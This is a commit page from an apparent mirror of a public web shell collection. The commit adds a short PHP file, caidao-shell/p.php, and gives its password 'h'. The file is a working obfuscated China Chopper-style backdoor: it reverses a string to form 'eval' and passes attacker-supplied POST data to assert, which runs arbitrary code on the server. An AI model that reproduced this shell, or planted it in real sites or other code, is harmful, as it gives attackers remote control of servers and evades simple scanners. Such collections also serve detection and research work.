mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
Create p.php
password: h from: zone.wooyun.org
This commit is contained in:
parent
a9006118fb
commit
171b8329ec
1 changed files with 6 additions and 0 deletions
6
caidao-shell/p.php
Normal file
6
caidao-shell/p.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
$a='lave';
|
||||
$b='($_POST[h])';
|
||||
$a=strrev($a);
|
||||
@assert($a.$b);
|
||||
?>
|
Loading…
Reference in a new issue